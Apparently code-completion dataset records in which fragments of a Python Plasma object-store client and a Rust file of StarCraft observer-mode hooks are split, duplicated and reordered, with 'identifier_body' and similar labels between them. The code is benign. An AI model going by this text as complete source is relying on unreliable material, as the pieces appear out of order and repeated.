# Turn the metadata into the right type.
metadata = bytearray("") if metadata is None else metadata
buff = libplasma.create(self.conn, object_id, size, metadata)
return PlasmaBuffer(buff, object_id, self)
def get(self, object_id):
"""Create a buffer from the PlasmaStore based on object ID.
If the object has not been sealed yet, this call will block. The retrieved
buffer is immutable.
Args:
object_id (str): A string used to identify an object.
"""
buff = libplasma.get(self.conn, object_id)[0]
return PlasmaBuffer(buff, object_id, self)
def get_metadata(self, object_id):
"""Create a buffer from the PlasmaStore based on object ID.
If the object has not been sealed yet, this call will block until the object
has been sealed. The retrieved buffer is immutable.
Args:
object_id (str): A string used to identify an object.
"""
buff = libplasma.get(self.conn, object_id)[1]
return PlasmaBuffer(buff, object_id, self)
def contains(self, object_id):
"""Check if the object is present and has been sealed in the PlasmaStore.
Args:
object_id (str): A string used to identify an object.
"""
return libplasma.contains(self.conn, object_id)
def seal(self, object_id):
"""Seal the buffer in the PlasmaStore for a particular object ID.
Once a buffer has been sealed, the buffer is immutable and can only be
accessed through get.
Args:
object_id (str): A string used to identify an object.
"""
libplasma.seal(self.conn, object_id)
def delete(self, object_id):
"""Delete the buffer in the PlasmaStore for a particular object ID.
Once a buffer has been deleted, the buffer is no longer accessible.
Args:
object_id (str): A string used to identify an object.
"""
libplasma.delete(self.conn, object_id)
def evict(self, num_bytes):
"""Evict some objects until to recover some bytes.
Recover at least num_bytes bytes if possible.
Args:
num_bytes (int): The number of bytes to attempt to recover.
"""
return libplasma.evict(self.conn, num_bytes)
def transfer(self, addr, port, object_id):
"""Transfer local object with id object_id to another plasma instance
Args:
addr (str): IPv4 address of the plasma instance the object is sent to.
port (int): Port number of the plasma instance the object is sent to.
object_id (str): A string used to identify an object.
"""
return libplasma.transfer(self.conn, object_id, addr, port)
def fetch(self, object_ids):
"""Fetch the object with id object_id from another plasma manager instance.
Args:
object_id (str): A string used to identify an object.
"""
return libplasma.fetch(self.conn, object_ids)
def wait(self, object_ids, timeout=PLASMA_WAIT_TIMEOUT, num_returns=1):
"""Wait until num_returns objects in object_ids are ready.
Args:
object_ids (List[str]): List of object IDs to wait for.
timeout (int): Return to the caller after timeout milliseconds.
num_returns (int): We are waiting for this number of objects to be ready.
Returns:
ready_ids, waiting_ids (List[str], List[str]): List of object IDs that
are ready and list of object IDs we might still wait on respectively.
"""
ready_ids, waiting_ids = libplasma.wait(self.conn, object_ids, timeout, num_returns)
return ready_ids, list(waiting_ids)
def subscribe(self):
"""Subscribe to notifications about sealed objects."""
fd = libplasma.subscribe(self.conn)
self.notification_sock = socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM)
# Make the socket non-blocking.
self.notification_sock.setblocking(0)
def get_next_notification(self):
"""Get the next notification from the notification socket."""
if not self.notification_sock:
raise Exception("To get notifications, first call subscribe.")
# Loop until we've read PLASMA_ID_SIZE bytes from the socket.
while True:
try:
message_data = self.notification_sock.recv(PLASMA_ID_SIZE)
except socket.error:
time.sleep(0.001)
else:
assert len(message_data) == PLASMA_ID_SIZE
break
return message_data
DEFAULT_PLASMA_STORE_MEMORY = 10 ** 9
def random_name():
return str(random.randint(0, 99999999))
def start_plasma_store(plasma_store_memory=DEFAULT_PLASMA_STORE_MEMORY, use_valgrind=False, use_profiler=False):
|
def start_plasma_manager(store_name, redis_address, num_retries=20, use_valgrind=False, run_profiler=False):
"""Start a plasma manager and return the ports it listens on.
Args:
store_name (str): The name of the plasma store socket.
redis_address (str): The address of the Redis server.
use_valgrind (bool): True if the Plasma manager should be started inside of
valgrind and False otherwise.
Returns:
A tuple of the Plasma manager socket name, the process ID of the Plasma
manager process, and the port that the manager is listening on.
Raises:
Exception: An exception is raised if the manager could not be started.
"""
plasma_manager_executable = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../../build/plasma_manager")
plasma_manager_name = "/tmp/scheduler{}".format(random_name())
port = None
process = None
counter = 0
while counter < num_retries:
if counter > 0:
print("Plasma manager failed to start, retrying now.")
port = random.randint(10000, 65535)
command = [plasma_manager_executable,
"-s", store_name,
"-m", plasma_manager_name,
"-h", "127.0.0.1",
"-p", str(port),
"-r", redis_address]
if use_valgrind:
process = subprocess.Popen(["valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--error-exitcode=1"] + command)
elif run_profiler:
process = subprocess.Popen(["valgrind", "--tool=callgrind"] + command)
else:
process = subprocess.Popen(command)
# This sleep is critical. If the plasma_manager fails to start because the
# port is already in use, then we need it to fail within 0.1 seconds.
time.sleep(0.1)
# See if the process has terminated
if process.poll() == None:
return plasma_manager_name, process, port
counter += 1
raise Exception("Couldn't start plasma manager.")
| """Start a plasma store process.
Args:
use_valgrind (bool): True if the plasma store should be started inside of
valgrind. If this is True, use_profiler must be False.
use_profiler (bool): True if the plasma store should be started inside a
profiler. If this is True, use_valgrind must be False.
Return:
A tuple of the name of the plasma store socket and the process ID of the
plasma store process.
"""
if use_valgrind and use_profiler:
raise Exception("Cannot use valgrind and profiler at the same time.")
plasma_store_executable = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../../build/plasma_store")
plasma_store_name = "/tmp/scheduler{}".format(random_name())
command = [plasma_store_executable, "-s", plasma_store_name, "-m", str(plasma_store_memory)]
if use_valgrind:
pid = subprocess.Popen(["valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--error-exitcode=1"] + command)
time.sleep(1.0)
elif use_profiler:
pid = subprocess.Popen(["valgrind", "--tool=callgrind"] + command)
time.sleep(1.0)
else:
pid = subprocess.Popen(command)
time.sleep(0.1)
return plasma_store_name, pid | identifier_body |
plasma.py | import os
import random
import socket
import subprocess
import time
import libplasma
PLASMA_ID_SIZE = 20
PLASMA_WAIT_TIMEOUT = 2 ** 30
class PlasmaBuffer(object):
"""This is the type of objects returned by calls to get with a PlasmaClient.
We define our own class instead of directly returning a buffer object so that
we can add a custom destructor which notifies Plasma that the object is no
longer being used, so the memory in the Plasma store backing the object can
potentially be freed.
Attributes:
buffer (buffer): A buffer containing an object in the Plasma store.
plasma_id (PlasmaID): The ID of the object in the buffer.
plasma_client (PlasmaClient): The PlasmaClient that we use to communicate
with the store and manager.
"""
def __init__(self, buff, plasma_id, plasma_client):
"""Initialize a PlasmaBuffer."""
self.buffer = buff
self.plasma_id = plasma_id
self.plasma_client = plasma_client
def __del__(self):
"""Notify Plasma that the object is no longer needed.
If the plasma client has been shut down, then don't do anything.
"""
if self.plasma_client.alive:
libplasma.release(self.plasma_client.conn, self.plasma_id)
def __getitem__(self, index):
"""Read from the PlasmaBuffer as if it were just a regular buffer."""
return self.buffer[index]
def __setitem__(self, index, value):
"""Write to the PlasmaBuffer as if it were just a regular buffer.
This should fail because the buffer should be read only.
"""
self.buffer[index] = value
def __len__(self):
"""Return the length of the buffer."""
return len(self.buffer)
class PlasmaClient(object):
"""The PlasmaClient is used to interface with a plasma store and a plasma manager.
The PlasmaClient can ask the PlasmaStore to allocate a new buffer, seal a
buffer, and get a buffer. Buffers are referred to by object IDs, which are
strings.
"""
def __init__(self, store_socket_name, manager_socket_name=None, release_delay=64):
"""Initialize the PlasmaClient.
Args:
store_socket_name (str): Name of the socket the plasma store is listening at.
manager_socket_name (str): Name of the socket the plasma manager is listening at.
"""
self.alive = True
if manager_socket_name is not None:
self.conn = libplasma.connect(store_socket_name, manager_socket_name, release_delay)
else:
self.conn = libplasma.connect(store_socket_name, "", release_delay)
def shutdown(self):
"""Shutdown the client so that it does not send messages.
If we kill the Plasma store and Plasma manager that this client is connected
to, then we can use this method to prevent the client from trying to send
messages to the killed processes.
"""
if self.alive:
libplasma.disconnect(self.conn)
self.alive = False
def create(self, object_id, size, metadata=None):
"""Create a new buffer in the PlasmaStore for a particular object ID.
The returned buffer is mutable until seal is called.
Args:
object_id (str): A string used to identify an object.
size (int): The size in bytes of the created buffer.
metadata (buffer): An optional buffer encoding whatever metadata the user
wishes to encode.
"""
# Turn the metadata into the right type.
metadata = bytearray("") if metadata is None else metadata
buff = libplasma.create(self.conn, object_id, size, metadata)
return PlasmaBuffer(buff, object_id, self)
def get(self, object_id):
"""Create a buffer from the PlasmaStore based on object ID.
If the object has not been sealed yet, this call will block. The retrieved
buffer is immutable.
Args:
object_id (str): A string used to identify an object.
"""
buff = libplasma.get(self.conn, object_id)[0]
return PlasmaBuffer(buff, object_id, self)
def get_metadata(self, object_id):
"""Create a buffer from the PlasmaStore based on object ID.
If the object has not been sealed yet, this call will block until the object
has been sealed. The retrieved buffer is immutable.
Args:
object_id (str): A string used to identify an object.
"""
buff = libplasma.get(self.conn, object_id)[1]
return PlasmaBuffer(buff, object_id, self)
def contains(self, object_id):
"""Check if the object is present and has been sealed in the PlasmaStore.
Args:
object_id (str): A string used to identify an object.
"""
return libplasma.contains(self.conn, object_id)
def seal(self, object_id):
"""Seal the buffer in the PlasmaStore for a particular object ID.
Once a buffer has been sealed, the buffer is immutable and can only be
accessed through get.
Args:
object_id (str): A string used to identify an object.
"""
libplasma.seal(self.conn, object_id)
def delete(self, object_id):
"""Delete the buffer in the PlasmaStore for a particular object ID.
Once a buffer has been deleted, the buffer is no longer accessible.
Args:
object_id (str): A string used to identify an object.
"""
libplasma.delete(self.conn, object_id)
def evict(self, num_bytes):
"""Evict some objects until to recover some bytes.
Recover at least num_bytes bytes if possible.
Args:
num_bytes (int): The number of bytes to attempt to recover. | def transfer(self, addr, port, object_id):
"""Transfer local object with id object_id to another plasma instance
Args:
addr (str): IPv4 address of the plasma instance the object is sent to.
port (int): Port number of the plasma instance the object is sent to.
object_id (str): A string used to identify an object.
"""
return libplasma.transfer(self.conn, object_id, addr, port)
def fetch(self, object_ids):
"""Fetch the object with id object_id from another plasma manager instance.
Args:
object_id (str): A string used to identify an object.
"""
return libplasma.fetch(self.conn, object_ids)
def wait(self, object_ids, timeout=PLASMA_WAIT_TIMEOUT, num_returns=1):
"""Wait until num_returns objects in object_ids are ready.
Args:
object_ids (List[str]): List of object IDs to wait for.
timeout (int): Return to the caller after timeout milliseconds.
num_returns (int): We are waiting for this number of objects to be ready.
Returns:
ready_ids, waiting_ids (List[str], List[str]): List of object IDs that
are ready and list of object IDs we might still wait on respectively.
"""
ready_ids, waiting_ids = libplasma.wait(self.conn, object_ids, timeout, num_returns)
return ready_ids, list(waiting_ids)
def subscribe(self):
"""Subscribe to notifications about sealed objects."""
fd = libplasma.subscribe(self.conn)
self.notification_sock = socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM)
# Make the socket non-blocking.
self.notification_sock.setblocking(0)
def get_next_notification(self):
"""Get the next notification from the notification socket."""
if not self.notification_sock:
raise Exception("To get notifications, first call subscribe.")
# Loop until we've read PLASMA_ID_SIZE bytes from the socket.
while True:
try:
message_data = self.notification_sock.recv(PLASMA_ID_SIZE)
except socket.error:
time.sleep(0.001)
else:
assert len(message_data) == PLASMA_ID_SIZE
break
return message_data
DEFAULT_PLASMA_STORE_MEMORY = 10 ** 9
def random_name():
return str(random.randint(0, 99999999))
def start_plasma_store(plasma_store_memory=DEFAULT_PLASMA_STORE_MEMORY, use_valgrind=False, use_profiler=False):
"""Start a plasma store process.
Args:
use_valgrind (bool): True if the plasma store should be started inside of
valgrind. If this is True, use_profiler must be False.
use_profiler (bool): True if the plasma store should be started inside a
profiler. If this is True, use_valgrind must be False.
Return:
A tuple of the name of the plasma store socket and the process ID of the
plasma store process.
"""
if use_valgrind and use_profiler:
raise Exception("Cannot use valgrind and profiler at the same time.")
plasma_store_executable = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../../build/plasma_store")
plasma_store_name = "/tmp/scheduler{}".format(random_name())
command = [plasma_store_executable, "-s", plasma_store_name, "-m", str(plasma_store_memory)]
if use_valgrind:
pid = subprocess.Popen(["valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--error-exitcode=1"] + command)
time.sleep(1.0)
elif use_profiler:
pid = subprocess.Popen(["valgrind", "--tool=callgrind"] + command)
time.sleep(1.0)
else:
pid = subprocess.Popen(command)
time.sleep(0.1)
return plasma_store_name, pid
def start_plasma_manager(store_name, redis_address, num_retries=20, use_valgrind=False, run_profiler=False):
"""Start a plasma manager and return the ports it listens on.
Args:
store_name (str): The name of the plasma store socket.
redis_address (str): The address of the Redis server.
use_valgrind (bool): True if the Plasma manager should be started inside of
valgrind and False otherwise.
Returns:
A tuple of the Plasma manager socket name, the process ID of the Plasma
manager process, and the port that the manager is listening on.
Raises:
Exception: An exception is raised if the manager could not be started.
"""
plasma_manager_executable = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../../build/plasma_manager")
plasma_manager_name = "/tmp/scheduler{}".format(random_name())
port = None
process = None
counter = 0
while counter < num_retries:
if counter > 0:
print("Plasma manager failed to start, retrying now.")
port = random.randint(10000, 65535)
command = [plasma_manager_executable,
"-s", store_name,
"-m", plasma_manager_name,
"-h", "127.0.0.1",
"-p", str(port),
"-r", redis_address]
if use_valgrind:
process = subprocess.Popen(["valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--error-exitcode=1"] + command)
elif run_profiler:
process = subprocess.Popen(["valgrind", "--tool=callgrind"] + command)
else:
process = subprocess.Popen(command)
# This sleep is critical. If the plasma_manager fails to start because the
# port is already in use, then we need it to fail within 0.1 seconds.
time.sleep(0.1)
# See if the process has terminated
if process.poll() == None:
return plasma_manager_name, process, port
counter += 1
raise Exception("Couldn't start plasma manager.") | """
return libplasma.evict(self.conn, num_bytes)
| random_line_split |
observing.rs | use std::ffi::CStr;
use std::mem;
use libc::c_void;
use crate::bw;
use crate::bw_1161::{self, vars};
pub unsafe fn process_commands_hook(
data: *const u8,
len: u32,
replay: u32,
orig: unsafe extern fn(*const u8, u32, u32),
) {
if replay == 0 && *vars::current_command_player >= 8 {
// Replace anything sent by observers with a keep alive command, I'm quite sure there will
// be buffer overflows otherwise.
let buf = [0x05u8];
orig(buf.as_ptr(), 1, replay);
} else {
orig(data, len, replay);
}
}
// Don't validate sync commands when observing. As the sync contains visibility info, observers
// are out of sync from everyone else, as their vision settings are not sent to other players.
pub unsafe fn sync_command_hook(
data: *const u8,
orig: unsafe extern fn(*const u8) -> u32,
) -> u32 {
if is_local_player_observer() {
1
} else {
orig(data)
}
}
pub unsafe fn chat_message_hook(
storm_player: u32,
message: *const u8,
length: u32,
orig: unsafe extern fn(u32, *const u8, u32) -> u32,
) -> u32 {
use std::io::Write;
if vars::storm_id_to_human_id[storm_player as usize] >= 8 {
// Observer message, we'll have to manually print text and add to replay recording.
let message = std::slice::from_raw_parts(message, length as usize);
// The length should include null byte
if message.last() != Some(&0) {
return 0;
}
// There's some unnecessary control information at the start of message
let text = match message.get(2..(message.len() - 1)) {
Some(s) => s,
None => return 0,
};
let mut buf = [0; 512];
let format = |mut pos: &mut [u8], msg_color: u8| -> Result<(), std::io::Error> {
// Write "\x1f{player}: \x02{message}"
// 0x1f is the neutral cyan color and 0x02 is the regular chat message one.
write!(&mut pos, "\x1f")?;
let name = CStr::from_ptr(
vars::storm_players[storm_player as usize].name.as_ptr() as *const i8
);
pos.write_all(name.to_bytes())?;
write!(&mut pos, ": ")?;
pos.write_all(&[msg_color])?;
pos.write_all(text)?;
Ok(())
};
let _ = format(&mut buf[..], 0x02);
let mut replay_command = [0u8; 0x52];
replay_command[0] = 0x5c; // Replay chat
replay_command[1] = 0x8; // Player
let _ = (&mut replay_command[2..]).write(&buf[..]);
replay_command[0x51] = 0;
bw_1161::add_to_replay_data(
*vars::replay_data,
replay_command.as_ptr(),
replay_command.len() as u32,
storm_player,
);
if storm_player == *vars::local_storm_id {
// Switch the message to be green to show it's player's own message
let _ = format(&mut buf[..], 0x07);
}
bw_1161::display_message(buf.as_ptr(), 0);
return length;
} else {
orig(storm_player, message, length)
}
}
pub unsafe fn load_dialog_hook(
dialog: *mut bw::Dialog,
base: *mut c_void,
event_handler: *mut c_void,
source_file: *const u8,
source_line: u32,
orig: unsafe extern fn(*mut bw::Dialog, *mut c_void, *mut c_void, *const u8, u32),
) {
orig(dialog, base, event_handler, source_file, source_line);
if !is_local_player_observer() {
return;
}
let name = CStr::from_ptr((*dialog).control.string as *const i8).to_bytes();
if name == b"TextBox" {
if let Some(to_allies) = find_dialog_child(dialog, 0x2) {
(*to_allies).string = b"To Observers:\0".as_ptr();
// Of course the control has to be resized by hand <.<
// Possibly could also just make it left aligned.
// This can be determined "easily" by breaking 1.16.1 in debugger at 004F2FFF when
// opening chat entry while talking to one player, and replacing the "To player:"
// string, and stepping over the call.
(*to_allies).area.right = 0x55;
} else {
error!("Couldn't find 'To Allies:' control");
}
} else if name == b"MsgFltr" {
if let Some(to_allies) = find_dialog_child(dialog, 0x3) {
(*to_allies).string = b"Send to observers\0".as_ptr();
} else {
error!("Couldn't find 'Send to allies' control");
}
}
}
pub unsafe fn init_ui_variables_hook(orig: unsafe extern fn()) {
orig();
if is_local_player_observer() {
*vars::replay_visions = 0xff;
*vars::player_visions = 0xff;
// To allies (=observers)
(*vars::game).chat_dialog_recipient = 9;
// Could also set the race, it currently just does an overflow read to zerg.
}
}
pub unsafe fn cmdbtn_event_handler_hook(
control: *mut bw::Control,
event: *mut bw::UiEvent,
orig: unsafe extern fn(*mut bw::Control, *mut bw::UiEvent) -> u32,
) -> u32 {
if !is_local_player_observer() {
orig(control, event)
} else {
// Disable clicking on command buttons.
// Event 4 = Left click, 6 = Double click, Extended 3 = Hotkey
if (*event).ty == 0x4 || (*event).ty == 0x6 {
0
} else if (*event).ty == 0xe && (*event).extended_type == 3 {
1
} else {
orig(control, event)
}
}
}
pub unsafe fn get_gluall_string_hook(
string_id: u32,
orig: unsafe extern fn(u32) -> *const u8,
) -> *const u8 {
// Replace "Replay players" text in the alliance dialog when observing
if string_id == 0xb6 && is_local_player_observer() {
"Players\0".as_ptr()
} else {
orig(string_id)
}
}
pub unsafe fn update_net_timeout_players(orig: unsafe extern fn()) {
unsafe fn find_timeout_dialog_player_label(bw_player: u8) -> Option<*mut bw::Control> |
// To make observers appear in network timeout dialog, we temporarily write their info to
// ingame player structure, and revert the change after this function has been called.
let bw_players: &mut [bw::Player] = &mut vars::players[..8];
let actual_players: [bw::Player; 8] = {
let mut players: [bw::Player; 8] = mem::zeroed();
for i in 0..players.len() {
players[i] = bw_players[i].clone();
}
players
};
let mut overwritten_player_id_to_storm = [None; 8];
for storm_id in 0..8 {
let is_obs = !actual_players.iter().any(|x| x.storm_id == storm_id);
if is_obs {
match bw_players
.iter()
.position(|x| x.player_type != bw::PLAYER_TYPE_HUMAN)
{
Some(pos) => {
overwritten_player_id_to_storm[pos] = Some(storm_id);
bw_players[pos].storm_id = storm_id;
bw_players[pos].player_type = bw::PLAYER_TYPE_HUMAN;
}
None => {
error!(
"Net timeout dialog: Out of player slots for observer, storm id {}",
storm_id
);
}
}
}
}
orig();
for bw_player in 0..8 {
if let Some(storm_id) = overwritten_player_id_to_storm[bw_player] {
if let Some(ctrl) = find_timeout_dialog_player_label(bw_player as u8) {
// We need to redirect the name string to the storm player string, and replace the
// player value to unused player 10, whose color will be set to neutral resource
// color. (The neutral player 11 actually can have a different color for neutral
// buildings)
//
// Technically player 10 can actually have units in some odd UMS maps, but we
// aren't allowing observing UMS games anyways, so whatever. Even if the someone
// noticed the color changing, I doubt they would care.
(*ctrl).string = vars::storm_players[storm_id as usize].name.as_ptr();
(*ctrl).user_ptr = 10usize as *mut c_void;
(*vars::game).player_minimap_color[10] = *vars::resource_minimap_color;
}
}
}
for (i, player) in actual_players.iter().enumerate() {
vars::players[i] = player.clone();
}
}
pub unsafe fn update_command_card_hook(orig: unsafe extern fn()) {
if is_local_player_observer() && !(*vars::primary_selected).is_null() {
*vars::local_nation_id = (**vars::primary_selected).player as u32;
orig();
*vars::local_nation_id = !0;
} else {
orig();
}
}
pub unsafe fn draw_command_button_hook(
control: *mut bw::Control,
x: i32,
y: i32,
area: *mut c_void,
orig: unsafe extern fn(*mut bw::Control, i32, i32, *mut c_void),
) {
// Need to disable replay flag being set from DrawScreenHook if observing
let was_replay = *vars::is_replay;
if is_local_player_observer() {
*vars::is_replay = 0;
}
orig(control, x, y, area);
*vars::is_replay = was_replay;
}
pub unsafe fn center_screen_on_start_location(
unit: *mut bw::PreplacedUnit,
other: *mut c_void,
orig: unsafe extern fn(*mut bw::PreplacedUnit, *mut c_void) -> u32,
) -> u32 {
let was_replay = *vars::is_replay;
if is_local_player_observer() && vars::players[(*unit).player as usize].player_type != 0 {
// Center the screen once we get the first active player so observers don't randomly
// end up staring at unused start location.
*vars::is_replay = 1;
}
let result = orig(unit, other);
*vars::is_replay = was_replay;
result
}
unsafe fn find_dialog_child(dialog: *mut bw::Dialog, child_id: i16) -> Option<*mut bw::Control> {
let mut control = (*dialog).first_child;
while !control.is_null() {
if (*control).id == child_id {
return Some(control);
}
control = (*control).next;
}
None
}
unsafe fn is_local_player_observer() -> bool {
// Should probs use shieldbattery's data instead of checking BW variables,
// but we don't have anything that's readily accessible by game thread.
*vars::local_nation_id == !0
}
pub unsafe fn with_replay_flag_if_obs<F: FnOnce() -> R, R>(func: F) -> R {
let was_replay = *vars::is_replay;
if is_local_player_observer() {
*vars::is_replay = 1;
}
let ret = func();
*vars::is_replay = was_replay;
ret
}
| {
if (*vars::timeout_bin).is_null() {
return None;
}
let mut label = find_dialog_child(*vars::timeout_bin, -10)?;
let mut label_count = 0;
while !label.is_null() && label_count < 8 {
// Flag 0x8 == Shown
if (*label).flags & 0x8 != 0 && (*label).user_ptr as usize == bw_player as usize {
return Some(label);
}
label = (*label).next;
label_count += 1;
}
None
} | identifier_body |
observing.rs | use std::ffi::CStr;
use std::mem;
use libc::c_void;
use crate::bw;
use crate::bw_1161::{self, vars};
pub unsafe fn process_commands_hook(
data: *const u8,
len: u32,
replay: u32,
orig: unsafe extern fn(*const u8, u32, u32),
) {
if replay == 0 && *vars::current_command_player >= 8 {
// Replace anything sent by observers with a keep alive command, I'm quite sure there will
// be buffer overflows otherwise.
let buf = [0x05u8];
orig(buf.as_ptr(), 1, replay);
} else {
orig(data, len, replay);
}
}
// Don't validate sync commands when observing. As the sync contains visibility info, observers
// are out of sync from everyone else, as their vision settings are not sent to other players.
pub unsafe fn sync_command_hook(
data: *const u8,
orig: unsafe extern fn(*const u8) -> u32,
) -> u32 {
if is_local_player_observer() {
1
} else {
orig(data)
}
}
pub unsafe fn | (
storm_player: u32,
message: *const u8,
length: u32,
orig: unsafe extern fn(u32, *const u8, u32) -> u32,
) -> u32 {
use std::io::Write;
if vars::storm_id_to_human_id[storm_player as usize] >= 8 {
// Observer message, we'll have to manually print text and add to replay recording.
let message = std::slice::from_raw_parts(message, length as usize);
// The length should include null byte
if message.last() != Some(&0) {
return 0;
}
// There's some unnecessary control information at the start of message
let text = match message.get(2..(message.len() - 1)) {
Some(s) => s,
None => return 0,
};
let mut buf = [0; 512];
let format = |mut pos: &mut [u8], msg_color: u8| -> Result<(), std::io::Error> {
// Write "\x1f{player}: \x02{message}"
// 0x1f is the neutral cyan color and 0x02 is the regular chat message one.
write!(&mut pos, "\x1f")?;
let name = CStr::from_ptr(
vars::storm_players[storm_player as usize].name.as_ptr() as *const i8
);
pos.write_all(name.to_bytes())?;
write!(&mut pos, ": ")?;
pos.write_all(&[msg_color])?;
pos.write_all(text)?;
Ok(())
};
let _ = format(&mut buf[..], 0x02);
let mut replay_command = [0u8; 0x52];
replay_command[0] = 0x5c; // Replay chat
replay_command[1] = 0x8; // Player
let _ = (&mut replay_command[2..]).write(&buf[..]);
replay_command[0x51] = 0;
bw_1161::add_to_replay_data(
*vars::replay_data,
replay_command.as_ptr(),
replay_command.len() as u32,
storm_player,
);
if storm_player == *vars::local_storm_id {
// Switch the message to be green to show it's player's own message
let _ = format(&mut buf[..], 0x07);
}
bw_1161::display_message(buf.as_ptr(), 0);
return length;
} else {
orig(storm_player, message, length)
}
}
pub unsafe fn load_dialog_hook(
dialog: *mut bw::Dialog,
base: *mut c_void,
event_handler: *mut c_void,
source_file: *const u8,
source_line: u32,
orig: unsafe extern fn(*mut bw::Dialog, *mut c_void, *mut c_void, *const u8, u32),
) {
orig(dialog, base, event_handler, source_file, source_line);
if !is_local_player_observer() {
return;
}
let name = CStr::from_ptr((*dialog).control.string as *const i8).to_bytes();
if name == b"TextBox" {
if let Some(to_allies) = find_dialog_child(dialog, 0x2) {
(*to_allies).string = b"To Observers:\0".as_ptr();
// Of course the control has to be resized by hand <.<
// Possibly could also just make it left aligned.
// This can be determined "easily" by breaking 1.16.1 in debugger at 004F2FFF when
// opening chat entry while talking to one player, and replacing the "To player:"
// string, and stepping over the call.
(*to_allies).area.right = 0x55;
} else {
error!("Couldn't find 'To Allies:' control");
}
} else if name == b"MsgFltr" {
if let Some(to_allies) = find_dialog_child(dialog, 0x3) {
(*to_allies).string = b"Send to observers\0".as_ptr();
} else {
error!("Couldn't find 'Send to allies' control");
}
}
}
pub unsafe fn init_ui_variables_hook(orig: unsafe extern fn()) {
orig();
if is_local_player_observer() {
*vars::replay_visions = 0xff;
*vars::player_visions = 0xff;
// To allies (=observers)
(*vars::game).chat_dialog_recipient = 9;
// Could also set the race, it currently just does an overflow read to zerg.
}
}
pub unsafe fn cmdbtn_event_handler_hook(
control: *mut bw::Control,
event: *mut bw::UiEvent,
orig: unsafe extern fn(*mut bw::Control, *mut bw::UiEvent) -> u32,
) -> u32 {
if !is_local_player_observer() {
orig(control, event)
} else {
// Disable clicking on command buttons.
// Event 4 = Left click, 6 = Double click, Extended 3 = Hotkey
if (*event).ty == 0x4 || (*event).ty == 0x6 {
0
} else if (*event).ty == 0xe && (*event).extended_type == 3 {
1
} else {
orig(control, event)
}
}
}
pub unsafe fn get_gluall_string_hook(
string_id: u32,
orig: unsafe extern fn(u32) -> *const u8,
) -> *const u8 {
// Replace "Replay players" text in the alliance dialog when observing
if string_id == 0xb6 && is_local_player_observer() {
"Players\0".as_ptr()
} else {
orig(string_id)
}
}
pub unsafe fn update_net_timeout_players(orig: unsafe extern fn()) {
unsafe fn find_timeout_dialog_player_label(bw_player: u8) -> Option<*mut bw::Control> {
if (*vars::timeout_bin).is_null() {
return None;
}
let mut label = find_dialog_child(*vars::timeout_bin, -10)?;
let mut label_count = 0;
while !label.is_null() && label_count < 8 {
// Flag 0x8 == Shown
if (*label).flags & 0x8 != 0 && (*label).user_ptr as usize == bw_player as usize {
return Some(label);
}
label = (*label).next;
label_count += 1;
}
None
}
// To make observers appear in network timeout dialog, we temporarily write their info to
// ingame player structure, and revert the change after this function has been called.
let bw_players: &mut [bw::Player] = &mut vars::players[..8];
let actual_players: [bw::Player; 8] = {
let mut players: [bw::Player; 8] = mem::zeroed();
for i in 0..players.len() {
players[i] = bw_players[i].clone();
}
players
};
let mut overwritten_player_id_to_storm = [None; 8];
for storm_id in 0..8 {
let is_obs = !actual_players.iter().any(|x| x.storm_id == storm_id);
if is_obs {
match bw_players
.iter()
.position(|x| x.player_type != bw::PLAYER_TYPE_HUMAN)
{
Some(pos) => {
overwritten_player_id_to_storm[pos] = Some(storm_id);
bw_players[pos].storm_id = storm_id;
bw_players[pos].player_type = bw::PLAYER_TYPE_HUMAN;
}
None => {
error!(
"Net timeout dialog: Out of player slots for observer, storm id {}",
storm_id
);
}
}
}
}
orig();
for bw_player in 0..8 {
if let Some(storm_id) = overwritten_player_id_to_storm[bw_player] {
if let Some(ctrl) = find_timeout_dialog_player_label(bw_player as u8) {
// We need to redirect the name string to the storm player string, and replace the
// player value to unused player 10, whose color will be set to neutral resource
// color. (The neutral player 11 actually can have a different color for neutral
// buildings)
//
// Technically player 10 can actually have units in some odd UMS maps, but we
// aren't allowing observing UMS games anyways, so whatever. Even if the someone
// noticed the color changing, I doubt they would care.
(*ctrl).string = vars::storm_players[storm_id as usize].name.as_ptr();
(*ctrl).user_ptr = 10usize as *mut c_void;
(*vars::game).player_minimap_color[10] = *vars::resource_minimap_color;
}
}
}
for (i, player) in actual_players.iter().enumerate() {
vars::players[i] = player.clone();
}
}
pub unsafe fn update_command_card_hook(orig: unsafe extern fn()) {
if is_local_player_observer() && !(*vars::primary_selected).is_null() {
*vars::local_nation_id = (**vars::primary_selected).player as u32;
orig();
*vars::local_nation_id = !0;
} else {
orig();
}
}
pub unsafe fn draw_command_button_hook(
control: *mut bw::Control,
x: i32,
y: i32,
area: *mut c_void,
orig: unsafe extern fn(*mut bw::Control, i32, i32, *mut c_void),
) {
// Need to disable replay flag being set from DrawScreenHook if observing
let was_replay = *vars::is_replay;
if is_local_player_observer() {
*vars::is_replay = 0;
}
orig(control, x, y, area);
*vars::is_replay = was_replay;
}
pub unsafe fn center_screen_on_start_location(
unit: *mut bw::PreplacedUnit,
other: *mut c_void,
orig: unsafe extern fn(*mut bw::PreplacedUnit, *mut c_void) -> u32,
) -> u32 {
let was_replay = *vars::is_replay;
if is_local_player_observer() && vars::players[(*unit).player as usize].player_type != 0 {
// Center the screen once we get the first active player so observers don't randomly
// end up staring at unused start location.
*vars::is_replay = 1;
}
let result = orig(unit, other);
*vars::is_replay = was_replay;
result
}
unsafe fn find_dialog_child(dialog: *mut bw::Dialog, child_id: i16) -> Option<*mut bw::Control> {
let mut control = (*dialog).first_child;
while !control.is_null() {
if (*control).id == child_id {
return Some(control);
}
control = (*control).next;
}
None
}
unsafe fn is_local_player_observer() -> bool {
// Should probs use shieldbattery's data instead of checking BW variables,
// but we don't have anything that's readily accessible by game thread.
*vars::local_nation_id == !0
}
pub unsafe fn with_replay_flag_if_obs<F: FnOnce() -> R, R>(func: F) -> R {
let was_replay = *vars::is_replay;
if is_local_player_observer() {
*vars::is_replay = 1;
}
let ret = func();
*vars::is_replay = was_replay;
ret
}
| chat_message_hook | identifier_name |
observing.rs | use std::ffi::CStr;
use std::mem;
use libc::c_void;
